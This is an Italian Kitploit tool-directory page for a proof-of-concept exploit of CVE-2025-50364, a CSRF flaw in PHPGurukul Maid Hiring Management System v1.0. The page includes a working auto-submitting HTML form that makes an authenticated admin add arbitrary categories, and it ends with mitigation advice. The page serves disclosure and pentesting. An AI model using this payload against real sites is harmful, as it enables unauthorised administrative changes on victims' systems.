Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE — Proof-of-concept di sfruttamento CSRF che mira a CVE-2025-50364 in PHPGurukul Maid Hiring Management System v1.0, che aggiunge categorie admin arbitrarie tramite un modulo HTML appositamente predisposto. | Kitploit
Strumenti/GitHubGitHub/1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHub1h3ll/cve-2025-50364_csrf_add_category-phpgurukul-cve

CVE-2025-50364_CSRF_ADD_CATEGORY-phpgurukul-CVE

Proof-of-concept di sfruttamento CSRF che mira a CVE-2025-50364 in PHPGurukul Maid Hiring Management System v1.0, che aggiunge categorie admin arbitrarie tramite un modulo HTML appositamente predisposto.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Nome del progetto e URL del repository: Sistema di gestione delle assunzioni di domestiche tramite PHP e MySQL

Tipo di vulnerabilità: Client Side Request Forgery

Versioni interessate: v1.0

💣Descrizione della vulnerabilità: Esiste una vulnerabilità di Cross-Site Request Forgery (CSRF) nel pannello di amministrazione del sistema di gestione delle assunzioni di PHPGurukul, che consente a un attaccante di aggiungere categorie di assunzione arbitrarie ingannando un amministratore autenticato facendogli visitare un sito malevolo. Ciò può portare a inquinamento dei dati e modifiche non autorizzate a livello di amministratore.

👩‍💻Impatto: Creazione non autorizzata di categorie

🛜Prova di concetto (PoC)

  1. C'era una funzionalità di aggiunta categoria accessibile solo ad amministratori autenticati. 1
  2. Codice HTML per inviare una richiesta POST all'endpoint /admin/add-category.php CSRF-POC 2
<html>
  <body>
    <form action="http://127.0.0.1/mhms/admin/add-category.php" method="POST">
      <input type="hidden" name="catname" value="CSRF&#45;POC" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
  1. Utilizza il codice HTML e crea un URL malevolo. 3
  2. Dopo che l'amministratore fa clic sul collegamento, verrà aggiunta una nuova categoria. 4 5

Raccomandazione: Implementare token CSRF nei moduli di amministrazione, imporre cookie SameSite e validare l'origine della richiesta per prevenire azioni non autorizzate.

Scarica lo strumento